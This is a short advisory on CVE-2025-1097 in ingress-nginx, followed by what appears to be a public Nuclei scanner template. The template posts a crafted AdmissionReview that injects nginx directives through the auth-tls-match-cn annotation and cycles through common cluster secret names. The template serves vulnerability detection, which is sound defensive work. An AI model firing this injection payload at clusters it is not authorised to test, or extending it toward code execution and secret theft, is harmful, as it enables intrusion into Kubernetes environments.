A security issue was discovered in ingress-nginx https-//github.com/kubernetes/ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
PoC代码[已公开]
id: CVE-2025-1097
info:
name: Ingress-Nginx Controller - Configuration Injection via Unsanitized `auth-tls-match-cn` Annotation
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
A security issue was discovered in ingress-nginx https-//github.com/kubernetes/ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
reference:
- https://github.com/kubernetes/kubernetes/issues/131007
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
- https://nvd.nist.gov/vuln/detail/CVE-2025-1097
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2025-1097
cwe-id: CWE-20
epss-score: 0.08524
epss-percentile: 0.92046
metadata:
verified: true
max-request: 1
shodan-query: ssl:"ingress-nginx" port:8443
tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s
variables:
string: "{{to_lower('{{randstr}}')}}"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"kind":"AdmissionReview","apiVersion":"admission.k8s.io/v1","request":{"uid":"{{string}}","kind":{"group":"networking.k8s.io","version":"v1","kind":"Ingress"},"resource":{"group":"networking.k8s.io","version":"v1","resource":"ingresses"},"namespace":"default","operation":"CREATE","userInfo":{"username":"admin"},"object":{"apiVersion":"networking.k8s.io/v1","kind":"Ingress","metadata":{"name":"{{string}}-auth-tls","namespace":"default","annotations":{"nginx.ingress.kubernetes.io/auth-tls-match-cn":"CN=abc #(\n){}\n }}\nssl_engine /aaa;\n#","nginx.ingress.kubernetes.io/auth-tls-secret":"{{secrets}}"}},"spec":{"ingressClassName":"nginx","rules":[{"host":"test.local","http":{"paths":[{"path":"/","pathType":"Prefix","backend":{"service":{"name":"dummy","port":{"number":80}}}}]}}]}}}}
payloads:
secrets:
- kube-system/konnectivity-certs
- kube-system/azure-wi-webhook-server-cert
- kube-system/aws-load-balancer-webhook-tls
- kube-system/hubble-server-certs
- kube-system/cilium-ca
- calico-system/node-certs
- cert-manager/cert-manager-webhook-ca
- linkerd/linkerd-policy-validator-k8s-tls
- linkerd/linkerd-proxy-injector-k8s-tls
- linkerd/linkerd-sp-validator-k8s-tls
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- 'AdmissionReview'
- 'could not load the shared library'
condition: and
# digest: 4a0a00473045022100e6c4bb01d50c3d5062ebdd169faab3ac9aed71bdb2750d554c2127a08cd83044022016896fa1102fc176a2d30bf7dfdabb154228e24b585ef0020b1ed9d495b9c119:922c64590222798bb761d5b6d8e72950